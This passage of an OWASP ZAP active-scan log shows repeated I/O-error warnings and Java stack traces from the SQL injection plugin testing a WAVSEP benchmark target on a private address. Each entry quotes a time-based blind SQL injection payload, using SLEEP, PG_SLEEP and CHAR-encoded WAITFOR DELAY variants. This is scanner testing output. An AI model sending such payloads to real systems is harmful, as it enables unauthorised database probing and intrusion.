parameter [target] and payload [content.ini');(SELECT * FROM (SELECT(SLEEP(5)))CmiK)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini');(SELECT * FROM (SELECT(SLEEP(5)))CmiK)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688272 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';(SELECT * FROM (SELECT(SLEEP(5)))OZja)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini';(SELECT * FROM (SELECT(SLEEP(5)))OZja)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688274 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))sykV)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))sykV)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688275 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;(SELECT * FROM (SELECT(SLEEP(5)))lKDl)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))lKDl)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688277 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688279 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688280 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688280 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688281 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688282 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688283 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688285 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688286 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688287 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9688288 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';WAITFOR DELAY 